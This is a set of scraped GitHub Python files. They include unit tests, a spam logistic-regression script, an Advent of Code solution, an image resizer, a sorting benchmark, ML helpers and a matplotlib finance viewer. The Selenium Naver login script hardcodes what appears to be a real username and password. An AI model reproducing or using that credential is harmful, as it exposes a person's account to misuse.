\"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Missing api_name query parameter\"})\n }\n assert res == exp\n\n def test_invalid_api_name(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"][\"api_name\"] = \"INVALID\"\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Unsupported query param\"})\n }\n assert res == exp\n", "repo_name": "projectmovio/movie-service", "sub_path": "test/unittest/test_movies.py", "file_name": "test_movies.py", "file_ext": "py", "file_size_in_byte": 4618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.raises", "line_number": 20, "usage_type": "call"}, {"api_name": "api.movies.UnsupportedMethod", "line_number": 20, "usage_type": "argument"}, {"api_name": "api.movies.handle", "line_number": 21, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 54, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 73, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 89, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 92, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 125, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 136, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 144, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 147, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 156, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 161, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 170, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 177, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 182, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 185, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 189, "usage_type": "call"}]} +{"seq_id": "4329322169", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\n\ndef logist(z):\n ans = []\n for i in z:\n tem = []\n tem.append(1 / (1 + math.exp(-i[0])))\n ans.append(tem)\n return ans\n\n\ndef computeCost(X, Y, theta):\n sum = 0\n for i in range(len(Y)):\n h = 1 / (1 + math.exp(-np.dot(X.T[i], theta)))\n if h==0:\n if Y[i][0]==0:\n sum+=0\n else:\n sum-=999999\n elif h==1:\n if Y[i][0]==1:\n sum+=0\n else:\n sum-=999999\n else:sum += Y[i][0] * math.log(h) + (1 - Y[i][0]) * math.log(1 - h)\n return sum\n\n\ndef logistic_regression(X, Y, theta, rate=0.001, thredsome=-0.1, maxstep=10000):\n # update theta\n cost 
= computeCost(X, Y, theta)\n    picturelist = []\n    picturelist.append(cost)\n    step = 0\n    while cost < thredsome and step < maxstep:\n        h = np.array(logist(np.dot(X.T, theta)))\n        theta = theta + rate * np.dot(X, Y - h)\n        cost = computeCost(X, Y, theta)\n        picturelist.append(cost)\n        step += 1\n    if cost > thredsome:\n        # print(\"diverged\")\n        return theta, step, picturelist\n    return theta, step, picturelist\n\n\nf = open('spambase.data')\ndf = pd.read_csv(f, header=None)\ndf = df.values.tolist()\nfeaturelist = []\nfor i in df:\n    y = i[0].split()\n    for j in range(len(y)):\n        y[j] = float(y[j])\n    featurelist.append(y)\n\nX = []\nY = []\n\nfor i in featurelist:\n    tem = []\n    tem.append(i[-1])\n    Y.append(tem)\n    X.append(i[0:-1])\n\nY = np.array(Y)\nX = np.array(X)\n\nstand = StandardScaler()\nX = stand.fit_transform(X)\nX = X.T\nX = np.insert(X, 0, [1], axis=0)\n# train_X=X[:,0:4000]\n# test_X=X[:,4000:]\ntrain_X, test_X, train_Y, test_Y = train_test_split(X.T, Y)\n\ntrain_X = train_X.T\ntest_X = test_X.T\nprint(train_X.shape)\nprint(test_X.shape)\nprint(train_Y.shape)\nprint(test_Y.shape)\n\ntheta = np.zeros([len(X), 1], dtype=float)\n# cur_theta_BGD, step, lost_BGD = logistic_regression(train_X, train_Y, theta)\n#\n# picturex_BGD=np.arange(len(lost_BGD))\n# ax = plt.subplot(111)\n# plt.plot(picturex_BGD,lost_BGD,color='blue')\n# plt.title(\" the trend of likely function in training\")\n# ax.set_xlabel(\"step\")\n# ax.set_ylabel(\"value\")\n# plt.savefig(\"./likely_function.png\")\n# plt.show()\n#\n# print(cur_theta_BGD)\n# predict_BGD = logist(np.dot(test_X.T, cur_theta_BGD))\n#\n# predict_Y = []\n# # number of correctly predicted emails\n# predict_spam = 0\n# predict_good = 0\n# # number of emails in the test set\n# test_good = 0\n# test_spam = 0\n#\n# for i in test_Y:\n#     if i[0] == 1:\n#         test_spam += 1\n#     else:\n#         test_good += 1\n#\n# for i in predict_BGD:\n#     if i[0] >= 0.5:\n#         predict_Y.append(1)\n#     else:\n#         predict_Y.append(0)\n#\n# for i in range(len(predict_Y)):\n#     if predict_Y[i] == test_Y[i][0]:\n#         if predict_Y[i] == 1:\n#             predict_spam += 1\n#         else:\n#             predict_good += 1\n#\n# print(\"normal emails in the test set:\", test_good, \"correctly predicted normal emails:\", predict_good)\n# print(\"spam emails in the test set:\", test_spam, \"correctly predicted spam emails:\", predict_spam)\n# print(\"total correct predictions:\", (predict_spam + predict_good), \"overall accuracy:\", (predict_spam + predict_good) / len(predict_Y))\n", "repo_name": "BuleSky233/LogisticRegression", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 23, "usage_type": "call"}, {"api_name": "math.log", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "41491163844", "text": "import json\n\nwith open('input.txt') as f:\n    d = json.load(f)\n\nstack = [d]\ncount = 0\n\nwhile(len(stack) > 0):\n    el = stack.pop()\n    if type(el) == dict:\n        if \"red\" in el.values():\n            continue\n        [stack.append(el[x]) for x in el]\n    elif type(el) == list:\n        [stack.append(x) for x in el]\n    elif type(el) == int:\n        
count += el\n    \nprint(count)", "repo_name": "seyys/advent-of-code", "sub_path": "2015/day12/part2.py", "file_name": "part2.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "74965532964", "text": "from selenium import webdriver\nimport time\n\n# For Chrome | point this at the location of the chromedriver downloaded earlier.\ndriver = webdriver.Chrome('D:/python/crawling/chromedriver.exe')\n# Open the Naver login page through Chrome\ndriver.get('https://nid.naver.com/nidlogin.login')\n\ntime.sleep(1)\ndriver.find_element_by_name('id').send_keys('or_lln')\ntime.sleep(1)\ndriver.find_element_by_name('pw').send_keys('80dkgus14!')\n\n# xpath //*[@id=\"log.login\"]/fieldset/input\ndriver.find_element_by_xpath('//*[@id=\"log.login\"]').click()\n\n# from bs4 import BeautifulSoup as bs\n# driver.get('https://mail.naver.com/')\n# html = driver.page_source\n# soup = bs(html, \"html.parser\")\n# title_list = soup.find_all('strong','mail_title')\n#\n# for title in title_list:\n#     print(title.get_text())", "repo_name": "dhflxhdxhd/crawling_with_python", "sub_path": "sns_crawling_prac/selenium_login.py", "file_name": "selenium_login.py", "file_ext": "py", "file_size_in_byte": 788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "73598472806", "text": "# This is a function for scaling components up and down. The components in the ./tutle folder already have their backgrounds removed and were randomly shrunk; this is just uploaded for fun\nfrom rembg import remove\nfrom PIL import Image\nimport os\nimport random\nimport shutil\n\n\ndef get_folders(directory):\n    folders = []  # create an empty list to hold the folders\n    for entry in os.listdir(directory):  # iterate over every entry in the directory\n        if os.path.isdir(os.path.join(directory, entry)):  # if the entry is a folder\n            folders.append(entry)  # add the entry to the list\n    return folders  # return the list\n\n\nout_path = r''  # component output folder\npath = r\"\"  # component input folder\n\na = get_folders(path)  # print all folders under the F:/Python/PAMC directory\n\n# for dir in a:\n#     b = os.listdir(path + dir)\n#     for i in b:\n#         c = os.listdir(path + dir + \"/\" + i)\n#         for tutle in c:\n#             input_path = path + dir + \"/\" + i + '/' + tutle  # path of the input image\n#             output_path = path + dir + \"/\" + i + \"/\" + tutle  # path of the output image\n#             im = Image.open(input_path)  # open the image\n#             width, height = im.size  # get the original width and height\n#\n#             target_width = int(width * random.randint(18, 25) / 100)  # define the target width\n#             ratio = target_width / width  # compute the aspect ratio\n#             target_height = int(height * ratio)  # compute the target height\n#\n#             im = im.resize((target_width, target_height), Image.LANCZOS)  # shrink the image to the target size, using the LANCZOS filter\n#             im.save(output_path)  # save the shrunk image\n#             print(i + ' done!')\n\n\n# b = os.listdir(path)\n# for i in b:\n#     input_path2 = os.path.join(path, i)\n#     c = os.listdir(input_path2)\n#     for tutle in c:\n#         input_path = os.path.join(input_path2, tutle)\n#         shutil.copy(input_path, out_path)\n\nb = os.listdir(path)\nfor tutle in b:\n    input_path = path + tutle  # path of the input image\n    output_path = path + tutle  # path of the output image\n    im = Image.open(input_path)  # open the image\n    width, height = im.size  # get the original width and height\n\n    target_width = int(width * random.randint(18, 25) / 100)  # define the target width\n    ratio = target_width / width  # compute the aspect ratio\n    target_height = int(height * ratio)  # compute the target height\n\n    im = im.resize((target_width, target_height), Image.LANCZOS)  # shrink the image to the target size, using the LANCZOS filter
\n    im.save(output_path)  # save the shrunk image\n", "repo_name": "zhuerding/smart_tree", "sub_path": "mods/word_creative.py", "file_name": "word_creative.py", "file_ext": "py", "file_size_in_byte": 2493, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "28541961234", "text": "import random\nfrom timeit import repeat\n\nfrom matplotlib import pyplot as plt\n\n\ndef run_sorting_algorithm(algorithm, iterable):\n    setup = f\"\"\"from sorting_algorithms import {algorithm}\"\"\"\n    stmt = f\"{algorithm}.sort({iterable})\"\n    times = repeat(stmt=stmt, setup=setup, repeat=3, number=10)\n\n\n    return sum(times) / len(times)\n\n\ndef _print_table(columns, indexes, rows):\n    columns = \"\\t\\t\".join(columns)\n    print(f\"\\t{columns}\")\n    for idx, row in zip(indexes, rows):\n        row_str = \"\\t\".join(map(str, row))\n        print(f\"{idx}\\t{row_str}\")\n\n\ndef _plot_performances(algorithms, sizes, times):\n    plt.plot(sizes, times)\n    plt.legend(algorithms)\n    plt.title(\"Sorting Algorithms Complexity\")\n    plt.show()\n\n\nif __name__ == '__main__':\n    algorithms = [\n        # \"selection_sort\",\n        \"counting_sort\",\n        \"merge_sort\",\n        \"quicksort\",\n        \"python_sort\"\n    ]\n    max_size = 1e2\n    sizes = range(10, int(max_size), int((max_size - 10) // 10))\n    performances = []\n\n    for size in sizes:\n        iterable = [\n            random.randint(int(-1e3), int(1e3))\n            for _ in range(int(size))\n        ]\n        size_avg_times = []\n        for alg in algorithms:\n            avg_time = run_sorting_algorithm(alg, iterable)\n            size_avg_times.append(avg_time)\n        performances.append(size_avg_times)\n\n    _print_table(algorithms, sizes, performances)\n    _plot_performances(algorithms, sizes, performances)", "repo_name": "Mendes11/Sorting-Algorithms", "sub_path": "compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 1457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "timeit.repeat", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "32786665392", "text": "\nimport os\nimport joblib\nimport 
numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.base import BaseEstimator\nfrom sklearn.datasets import fetch_openml\n\n\nclass Never5Classifier(BaseEstimator):\n def fit(self, X, y=None):\n pass\n\n def predict(self, X):\n return np.zeros((len(X), 1), dtype=bool)\n\n\ndef dwldAndLoad(pth, dataset, version=1):\n datasetExists = os.path.exists(pth)\n if (not datasetExists):\n mnist = fetch_openml('mnist_784', version=version)\n joblib.dump(mnist, pth)\n else:\n mnist = joblib.load(pth)\n return mnist\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n\n\ndef plot_roc_curve(fpr, tpr, label=None):\n plt.plot(fpr, tpr, linewidth=2, label=label)\n plt.plot([0, 1], [0, 1], 'k--')\n\n\ndef pklFitModel(pth, model, X_train, y_train, OVW=False):\n mdlExists = os.path.exists(pth)\n if (not mdlExists) or (OVW):\n fit = model.fit(X_train, y_train)\n joblib.dump(fit, pth)\n else:\n fit = joblib.load(pth)\n return fit\n\n\ndef pklEval(pth, model, fun, X_train, y_train, OVW=False, **kwargs):\n mdlExists = os.path.exists(pth)\n if (not mdlExists) or (OVW):\n dta = fun(model, X_train, y_train, **kwargs)\n joblib.dump(dta, pth)\n else:\n dta = joblib.load(pth)\n return dta\n\n\ndef plot_digit(data):\n image = data.reshape(28, 28)\n plt.imshow(image, cmap=mpl.cm.binary, interpolation=\"nearest\")\n plt.axis(\"off\")\n", "repo_name": "Chipdelmal/HandsOnML", "sub_path": "03_Classification/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.base.BaseEstimator", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 22, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 23, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 43, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 53, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 55, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.cm", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "36655089831", "text": "\n# coding: utf-8\n\nimport os\nimport inspect\nimport datetime\nfrom datetime import date, timedelta\nimport copy\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\nimport matplotlib.dates as mdates\nfrom matplotlib.widgets import Button, SpanSelector, RadioButtons\nfrom matplotlib.dates import num2date, DayLocator\n\n\nclass Presenter():\n \n def __init__(self, model, view, files):\n self.model = model\n self.view = view\n self.files = files\n \n def showPlots(self):\n self.cleanedDf, self.wholeDf = self.model.parseFiles(self.files)\n self.view.showPlots(self.cleanedDf)\n \n def showDataframe(self):\n return self.wholeDf\n\n\nclass otpParser():\n \n def __init__(self):\n self.headers = ['accountNr', 'T/J', 'sum', 'currency', 'date', 'date2', 'balance', 'noIdea',\n 'noIdea2', 'comment', 'noIdea3', 'noIdea4', 'comment2']\n \n def parseFiles(self, files):\n dataFrames=[]\n \n for file in files:\n try:\n dataFrame = pd.read_csv(file, header=None)\n except :\n dataFrame = pd.read_csv(file, sep=';', header=None)\n dataFrames.append(dataFrame)\n for df in dataFrames:\n try:\n df.drop(df.columns[[13, 14]], axis=1, inplace=True)\n except:\n pass\n \n mergedFrame = pd.concat(dataFrames)\n mergedFrame.columns = self.headers \n mergedFrame = mergedFrame.reset_index(drop=True)\n mergedFrame = mergedFrame.sort_values(by='date')\n mergedFrame['comment'] = mergedFrame['comment'].replace(np.nan, '', regex=True)\n mergedFrame['comment'] = mergedFrame['comment'].apply((lambda x: ' '.join(x.split())))\n mergedFrame.loc[mergedFrame['comment']=='','comment'] = mergedFrame.loc[(mergedFrame[\"comment\"] == '') , \"comment2\"]\n cleanDf = mergedFrame.loc[:,['sum', 'date', 'comment','balance']]\n self.df = mergedFrame\n return cleanDf, mergedFrame\n\n def printDf(self):\n return self.df\n\n\nRED = (0.83921568627450982, 0.15294117647058825, 0.15686274509803921, 1.0)\nDARK_RED = (0.49803921568627452, 0.12156862745098039, 0.12156862745098039, 1.0)\nGREY = (0.5019607843137255, 0.5450980392156862, 0.5882352941176471, 1)\nGREEN = (0.098039215686274508, 0.43529411764705883, 0.23921568627450981, 1.0)\nDARK_GREEN = (0.0078431372549019607, 0.25490196078431371, 0.0078431372549019607, 1.0)\nPURPLE = (0.6666666666666666, 0.6745098039215687 ,0.8862745098039215,1.0)\nLIGHT_GREEN = (0.1568627450980392, 0.7058823529411765, 0.38823529411764707, 1.0)\nLIGHT_RED = (1.0, 0.2784313725490196, 0.2784313725490196, 1.0)\nLIGHT_GREY = (0.8352941176470589, 0.8470588235294118, 0.8627450980392157,1.0)\n\n# width = 0.3\nWIDTH = 12\nG_RAT = (1 + 5 ** 0.5) / 2 # golden ratio\nLABEL_ROTATION = 15 # DEGREES\nDATEFORMATSTRING = '%Y-%m-%d'\nDATEFROMAT = mdates.DateFormatter(DATEFORMATSTRING)\n# to highlight recatangles\ndark2light={DARK_RED:LIGHT_RED, DARK_GREEN:LIGHT_GREEN}\n# to unhighlight recatangles\ndark2normal={DARK_RED:RED, DARK_GREEN:GREEN}\nlight2normal={LIGHT_RED:RED, LIGHT_GREEN:GREEN}\n \nclass financeViewer():\n \n def __init__(self):\n\n 
self.box = dict(facecolor='blue', pad=3, alpha=0.2, boxstyle=\"Round4,pad=0.3\")\n self.transactionString =\"\"\"Date: {}\n Sum: {} HUF\n Comment: {}\"\"\"\n self.initString = \"\"\"\n Select a period to inspect transactions\n using your mouse, or change the settings\n \"\"\"\n \n self.scale1='log'\n self.scale2='log'\n self.mode = 'transaction' # the other mode is balance mode, modifies the top plot\n \n self.start, self.end = None, None\n \n def createFigure(self):\n # disable toolbar\n matplotlib.rcParams['toolbar'] = 'None'\n self.fig = plt.figure(figsize=(WIDTH, WIDTH/G_RAT),facecolor = LIGHT_GREY)\n\n self.gsp = gridspec.GridSpec(\n nrows = 3, ncols = 2, wspace = 0.05, hspace = 0.45,\n width_ratios = [G_RAT, 1], height_ratios = [(1+G_RAT)/G_RAT, G_RAT, 1])\n\n self.ax1 = plt.subplot(self.gsp[0,:])\n self.ax2 = plt.subplot(self.gsp[1:,0])\n self.ax3 = plt.subplot(self.gsp[2,1])\n self.ax4 = plt.subplot(self.gsp[1,1])\n\n def drawAxes(self):\n\n for ax in [self.ax1,self.ax2,self.ax3, self.ax4]: \n ax.set_facecolor(GREY)\n \n #####BIG PLOT## \n self.plotAx1()\n \n ####ZOOM PLOT##\n self.plotAx2()\n \n ##info plot##\n self.txt = self.ax3.text(0.1,0.5,self.initString,\n horizontalalignment='left',\n verticalalignment='center',\n fontsize=13, color='black',\n wrap = True)\n self.ax3.set_xticks([]) \n self.ax3.set_yticks([]) \n self.ax3.set_title('info about the transactions', bbox=self.box)\n\n ### place of buttons##\n self.ax4.set_xticks([]) \n self.ax4.set_yticks([]) \n\n def on_plot_hover(self, event):\n\n if not event.inaxes: return\n if event.inaxes!= self.ax2: return\n\n for idx,bar in enumerate(self.ax2.patches):\n if bar.get_x() < event.xdata < bar.get_x() + bar.get_width():\n if bar.get_y() < event.ydata < bar.get_y() + bar.get_height(): \n\n self.ax2.patches[idx].set_facecolor(dark2light[bar.get_edgecolor()])\n date_ordinal, y = self.ax2.transData.inverted().transform([event.x, event.y])+0.5\n \n # convert the numeric date into a datetime\n transDate = num2date(date_ordinal).strftime(DATEFORMATSTRING)\n pdDate = num2date(date_ordinal).strftime('%Y%m%d')\n try:\n comment = self.cleanDf.loc[(self.cleanDf['date'] == int(pdDate)) & (abs(self.cleanDf['sum'],)==bar.get_height()),'comment'].iloc[0]\n except:\n comment='Record not found'\n\n newStr = self.transactionString.format(transDate,bar.get_height(), comment)\n self.txt.set_text(newStr)\n else:\n self.ax2.patches[idx].set_facecolor(dark2normal[bar.get_edgecolor()])\n self.fig.canvas.draw()\n\n def reset_button_on_clicked(self, mouse_event): \n self.plotAx2()\n\n def balanceView_button_on_clicked(self, mouse_event):\n self.txt.set_text('Not implemented yet')\n\n def transView_button_on_clicked(self, mouse_event):\n self.txt.set_text('Not implemented yet')\n\n def plotAx2(self,): \n self.ax2.cla()\n self.ax2.set_title('Selected duration', bbox=self.box)\n if self.start != None:\n startDate = self.pdRange[self.start]\n endDate = self.pdRange[self.end]\n currentRange = pd.date_range(start=startDate, end=endDate, periods=None, freq='D', )\n indexes = []\n \n for idx, day in enumerate(self.incomeX):\n if (len(np.where(currentRange==day)[0])):\n indexes.append(idx)\n currIncomeX = np.array(self.incomeX)[indexes]\n currIncomeY = np.array(self.incomeY)[indexes]\n\n else:\n currentRange = self.pdRange\n currIncomeX = self.incomeX\n currIncomeY = self.incomeY\n \n baseArray = np.zeros(len(currentRange),dtype=np.float)\n \n self.ax2.bar(currIncomeX, currIncomeY, color=GREEN, edgecolor=DARK_GREEN)\n \n for expenseX, expenseY in 
zip(self.expenseXs, self.expenseYs):\n ## calculate bottom for this iteration\n currBottomIdxs =[]\n indexes = []\n\n for idx, day in enumerate(expenseX):\n if len(np.where(currentRange==day)[0]):\n currBottomIdxs.append(np.where(currentRange==day)[0][0])\n indexes.append(idx)\n\n expenseX = np.array(expenseX)[indexes]\n expenseY = np.array(expenseY)[indexes]\n bottom = baseArray[currBottomIdxs]\n self.ax2.bar(expenseX,expenseY,bottom=bottom, color=RED, edgecolor=DARK_RED)\n ### calculate baseArray for the next iteration\n\n baseArray[currBottomIdxs] += expenseY\n \n if self.start != None and self.end-self.start <= 4:\n print (333)\n self.ax2.xaxis.set_major_locator(DayLocator())\n \n self.ax2.xaxis.set_major_formatter(DATEFROMAT)\n self.ax2.set_yscale(self.scale2, nonposy='clip')\n self.ax2.yaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\n plt.setp( self.ax2.xaxis.get_majorticklabels(), rotation=LABEL_ROTATION )\n \n def plotAx1(self):\n \n self.ax1.cla()\n self.ax1.set_title('Whole duration',bbox=self.box)\n \n if self.mode == 'transaction':\n self.plotAx1_transaction()\n elif self.mode == 'balance':\n self.plotAx1_balance()\n else :\n raise ValueError('selected mode not supported: %s' % self.mode)\n \n \n self.span = SpanSelector(self.ax1, self.onselect, 'horizontal', \n rectprops=dict(alpha=0.3, facecolor=RED))\n \n self.ax1.xaxis.set_major_formatter(DATEFROMAT)\n self.ax1.set_yscale(self.scale1, nonposy='clip')\n self.ax1.yaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\n plt.setp( self.ax1.xaxis.get_majorticklabels(), rotation=LABEL_ROTATION )\n \n def plotAx1_balance(self):\n\n self.ax1.step(self.pdDates, self.balance, marker=\"d\", color = DARK_RED) \n \n def plotAx1_transaction(self):\n self.ax1.bar(self.incomeX, self.incomeY, color=GREEN,edgecolor=DARK_GREEN)\n \n baseArray = np.zeros(len(self.pdRange),dtype=np.float)\n for expenseX, expenseY in zip(self.expenseXs, self.expenseYs):\n ## calculate bottom for this iteration\n currBottomIdxs = [np.where(self.pdRange==day)[0][0] for day in expenseX]\n bottom = baseArray[currBottomIdxs]\n self.ax1.bar(expenseX,expenseY,bottom=bottom, color=RED, edgecolor=DARK_RED)\n ### calculate baseArray for the next iteration\n\n baseArray[currBottomIdxs] += expenseY \n \n def onselect(self, xmin, xmax):\n\n dayMin, dayMax = sorted((int(xmin-0.5), int(xmax+0.5)))\n ##xmin, xmax is days from zero, if Xaxis is pandas daterange\n yearZero = datetime.datetime.strptime('0001/01/01', \"%Y/%m/%d\")\n startDate = yearZero + timedelta(days=dayMin)\n endDate = yearZero + timedelta(days=dayMax)\n st=str(startDate)[:10]\n nd=str(endDate)[:10]\n\n stIdx, = np.where( self.pdRange.values==np.datetime64(st) )\n endIdx, = np.where( self.pdRange.values==np.datetime64(nd) )\n\n if stIdx and endIdx: \n stIdx , endIdx = stIdx[0], endIdx[0]\n # start and endpoints in of range\n elif stIdx:\n stIdx , endIdx = stIdx[0], len(self.pdRange)-1\n # endpoint out of range\n elif endIdx:\n stIdx , endIdx = 0, endIdx[0]\n # startpoint out of range \n else:\n # start and endpoints are out of range \")\n return\n\n self.start, self.end = stIdx, endIdx\n \n ist = int(st.replace(\"-\", \"\"))\n ind = int(nd.replace(\"-\", \"\"))\n\n selectedBalance = self.balance[(self.dateAxis>ist) & (self.dateAxis< ind)]\n selectionString = \"\"\"\n Selection: {} - {}\n Starting balance: {} HUF\n Final balance: {} HUF\n Difference: {} HUF\n \"\"\".format(st,nd, selectedBalance[0], selectedBalance[-1], selectedBalance[-1]-selectedBalance[0])\n 
